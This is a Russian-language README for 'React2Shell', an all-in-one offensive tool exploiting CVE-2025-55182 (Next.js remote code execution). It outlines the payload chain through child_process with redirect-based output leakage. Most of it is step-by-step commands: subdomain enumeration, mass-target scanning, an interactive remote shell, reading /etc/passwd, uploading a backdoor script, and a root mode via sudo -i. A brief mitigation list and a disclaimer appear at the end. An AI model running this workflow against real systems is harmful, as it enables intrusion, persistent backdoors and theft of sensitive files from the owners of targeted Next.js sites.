🚨 React2Shell — платформа эксплуатации CVE-2025-55182

Платформа для продвинутой эксплуатации CVE-2025-55182 (удалённое выполнение кода в Next.js)
Автор: opsecramdan
📚 Содержание
- Обзор
- Детали уязвимости
- Возможности
- Требования
- Установка
- Использование
- Интерактивная оболочка
- Выходные файлы
- Воздействие
- Меры защиты
- Ограничения
- Отказ от ответственности
📌 Обзор
React2Shell — платформа для эксплуатации, предназначенная для выявления и эксплуатации уязвимости CVE-2025-55182 в приложениях на базе Next.js.
Этот инструмент разработан как all-in-one набор для наступательных операций, который включает:
- Перебор поддоменов
- Сканирование уязвимостей
- Модуль эксплуатации
- Интерактивную удалённую оболочку
🔍 Детали уязвимости
- Идентификатор CVE: CVE-2025-55182
- Тип: удалённое выполнение кода (RCE)
- Платформа: Next.js
- Вектор атаки: вредоносный запрос multipart/form-data
- Воздействие: произвольное выполнение команд
🧠 Первопричина
Уязвимость использует внутренние механизмы Next.js следующим образом:
- Внедрение полезной нагрузки в запрос
- Вызов: process.mainModule.require('child_process')
- Выполнение команды ОС
- Кодирование вывода в Base64
- Утечка результата через редирект (
/login?a=)
⚙️ Возможности
🔎 Перебор поддоменов
- Сканирование DNS + HTTP
- Встроенный wordlist
- Поддержка пользовательского wordlist
- Автосохранение результатов
🧪 Сканер уязвимостей
- Тестирование нескольких конечных точек:
/
/api
/api/auth
/_next
/admin
/dashboard
- Анализ заголовков и ответов
- Снижение количества ложных срабатываний
💣 Модуль эксплуатации
- Автоматическая генерация полезной нагрузки
- Выполнение с кодированием в Base64
- Извлечение вывода на основе редиректа
🖥️ Интерактивная оболочка
- Удалённое выполнение команд
- Постоянная сессия
- Отслеживание текущей директории
📂 Операции с файлами
- Загрузка файла на цель
- Скачивание файла с цели
- Создание файла
👑 Режим root
- Выполнение
sudo -i
- Симуляция повышения привилегий
📦 Требования
Установка зависимостей:
pip install requests dnspython
📥 Установка
1. Клонирование репозитория
git clone https://github.com/yourusername/react2shell-cve-2025-55182.git
2. Переход в директорию
cd react2shell-cve-2025-55182
3. Запуск инструмента
python3 react2shell.py
🚀 Использование
🎯 Одиночная цель
python3 react2shell.py -u https://target.com
Без указания протокола:
python3 react2shell.py -u target.com
📄 Несколько целей
python3 react2shell.py -f targets.txt
Пример содержимого targets.txt:
https://target1.com
http://target2.com:3000
target3.com
🌐 Полный режим (разведка + сканирование + эксплуатация)
python3 react2shell.py -d example.com
Последовательность действий:
- Перебор поддоменов
- Сканирование уязвимостей
- Эксплуатация (опционально)
📚 Пользовательский wordlist
python3 react2shell.py -d example.com -w wordlist.txt
🐞 Режим отладки
python3 react2shell.py -d example.com --debug
🖥️ Интерактивная оболочка
После успешной эксплуатации вы получите доступ к оболочке.
Базовые команды
whoami
id
uname -a
pwd
ls -lah
⚙️ Специальные команды
📂 Загрузка файла
.upload shell.php /tmp/shell.php
📥 Скачивание файла
.download /etc/passwd
📄 Создание файла
.create /tmp/test.txt
🔄 Пример рабочего процесса
1. Сканирование домена
python3 react2shell.py -d example.com
2. Выявление уязвимых целей
3. Вход в оболочку
whoami
4. Загрузка полезной нагрузки
.upload backdoor.sh /tmp/backdoor.sh
📁 Выходные файлы
Инструмент создаёт следующие файлы:
- subdomains_*.txt
- vulnerable_*.txt
- output_*.txt
⚠️ Воздействие
При успешной эксплуатации:
- Удалённое выполнение команд
- Доступ к чувствительным файлам
- Загрузка бэкдора
- Постоянный доступ
- Повышение привилегий
🛡️ Меры защиты
- Обновите Next.js до последней версии
- Ограничьте доступ к внутренним конечным точкам
- Строго проверяйте входные данные
- Используйте WAF (OWASP CRS)
- Отслеживайте аномальную активность
⚠️ Отказ от ответственности
Этот инструмент создан только для:
- Обучения
- Исследований
- Авторизованного тестирования на проникновение
Запрещено использовать для незаконной деятельности.
⭐ Примечания
Этот проект демонстрирует:
- Навыки продвинутой эксплуатации
- Понимание внутреннего устройства Next.js
- Симуляцию атак, приближенных к реальным